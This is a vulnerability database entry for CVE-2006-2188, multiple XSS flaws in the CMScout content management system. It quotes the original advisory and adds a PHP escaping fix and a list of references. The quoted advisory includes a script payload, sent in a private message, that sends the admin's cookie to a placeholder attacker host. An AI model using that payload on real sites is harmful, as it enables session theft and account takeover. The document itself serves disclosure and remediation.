CMScout Multiple Cross-Site Scripting (XSS) Vulnerabilities

Vulnerability ID: 1195131
Vulnerability type: Cross-site scripting
Published: 2006-05-02
Updated: 2006-07-27
CVE ID: CVE-2006-2188
CNNVD-ID: CNNVD-200605-060
Platform: N/A
CVSS score: 6.8
|Vulnerability Source
https://www.securityfocus.com/bid/17796
https://cxsecurity.com/issue/WLB-2006050035
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-060
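|Vulnerability Details
CMScout 1.10 and earlier contain multiple cross-site scripting (XSS) vulnerabilities. Remote attackers can inject arbitrary web script or HTML via (1) the Body field of a private message (PM), (2) BBCode, or (3) forum posts.
|Exploit (EXP)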
Cmscout <= V1.10 multiple XSS attack vectors

Discovered by: Nomenumbra

Date: 5/2/2006

Impact: moderate (privilege escalation, possible defacement)

CMScout is a CMS (Content management system) for scouting related groups from around the world.

A CMS is a piece of web software that makes it easy for you to install, and manage a website.

CMScout includes all the features of other major CMS's that are available (Like PHP-Nuke, Mambo, e107, etc.).

Added news items and events are properly filtered for potential XSS input; input in the forums and PMs, however, is not.

For example, when one would send a PM to the admin like this:

Subject: whatever

Body: <script>window.navigate('http://www.evilhost.com/cookiestealer.php?c='+document.cookie)</script>

we could obtain the admin's cookie. The inside of BBcode isn't filtered either. This goes for the forums too.

Nomenumbra/[0x4F4C]
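
The missing output filtering described in the advisory, shown from the fixing side. This is an added example, not code from the advisory or from CMScout: `render_message()` is a hypothetical helper, the tag allow-list is an assumption, and the sample inputs are constructed. It escapes the untrusted PM or forum body first and only then expands BBCode, so markup inside a BBCode tag is neutralised too.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not a CMScout function): render an untrusted
// PM/forum body as HTML. Escape first, then expand allow-listed BBCode.
function render_message(string $raw): string
{
    // 1. Neutralise every HTML metacharacter, including both quote styles,
    //    so nothing the user typed can open a tag or leave an attribute.
    $html = htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    // 2. Expand simple paired tags. Their contents were escaped in step 1,
    //    so "[b]<script>...[/b]" becomes bold text, not a script element.
    $html = preg_replace('#\[b\](.*?)\[/b\]#is', '<strong>$1</strong>', $html) ?? $html;
    $html = preg_replace('#\[i\](.*?)\[/i\]#is', '<em>$1</em>', $html) ?? $html;

    // 3. Expand [url=...] only for http/https targets. Any other scheme is
    //    left as literal, already-escaped text instead of becoming a link.
    $html = preg_replace_callback(
        '#\[url=([^\]\s]+)\](.*?)\[/url\]#is',
        static function (array $m): string {
            if (!preg_match('#^https?://#i', $m[1])) {
                return $m[0];
            }
            // $m[1] is already attribute-safe: quotes and & were escaped.
            return '<a href="' . $m[1] . '" rel="nofollow noopener">' . $m[2] . '</a>';
        },
        $html
    ) ?? $html;

    // 4. Preserve line breaks for display.
    return nl2br($html);
}

// Constructed sample bodies (not taken from any real message).
$samples = [
    "hello <script>document.title='x'</script>",
    "[b]<script>document.title='x'</script>[/b]",
    "[url=https://example.org/?a=1&b=2]docs[/url]",
    "[url=ftp://example.org/file]not linked[/url]",
];

foreach ($samples as $body) {
    echo render_message($body), "\n";
}
```

Setting the session cookie with the `HttpOnly` attribute additionally keeps it out of reach of `document.cookie` if an injection point is missed.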
|Affected Products
CMScout CMScout 1.10
|References

Source: BID
Name: 17796
Link: http://www.securityfocus.com/bid/17796
Source: OSVDB
Name: 25247
Link: http://www.osvdb.org/25247
Source: OSVDB
Name: 25246
Link: http://www.osvdb.org/25246
Source: BUGTRAQ
Name: 20060502 Cmscout <= V1.10 multiple XSS attack vectors
Link: http://www.securityfocus.com/archive/1/archive/1/432725/100/0/threaded
Source: SECTRACK
Name: 1016023
Link: http://securitytracker.com/id?1016023
Source: SECUNIA
Name: 19933
Link: http://secunia.com/advisories/19933
Source: XF
Name: cmscout-messageform-xss(26223)
Link: http://xforce.iss.net/xforce/xfdb/26223
Source: SREASON
Name: 838
Link: http://securityreason.com/securityalert/838